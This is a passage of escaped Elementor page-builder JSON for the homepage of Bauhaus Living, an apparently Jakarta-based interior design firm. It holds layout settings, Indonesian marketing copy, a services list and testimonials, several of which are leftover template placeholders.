{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"